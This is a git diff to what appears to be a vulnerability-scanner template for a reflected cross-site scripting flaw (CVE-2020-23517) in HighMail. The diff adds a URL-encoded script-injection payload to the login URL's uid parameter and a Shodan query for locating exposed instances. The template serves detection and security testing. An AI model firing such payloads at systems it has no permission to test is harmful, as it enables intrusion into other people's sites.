diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml index 644463c4a1..fd20a0f37a 100644 --- a/cves/2020/CVE-2020-23517.yaml +++ b/cves/2020/CVE-2020-23517.yaml @@ -13,21 +13,30 @@ info: cvss-score: 6.1 cve-id: CVE-2020-23517 cwe-id: CWE-79 - tags: xss,cve,cve2020 + metadata: + verified: true + shodan-query: title:"HighMail" + tags: cve,cve2020,xss,cms,highmail requests: - method: GET path: - - "{{BaseURL}}/login/?uid=\">" + - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word words: - text/html part: header + - type: word words: - - "' + + - type: status + status: + - 200 # Enhanced by mp on 2022/03/14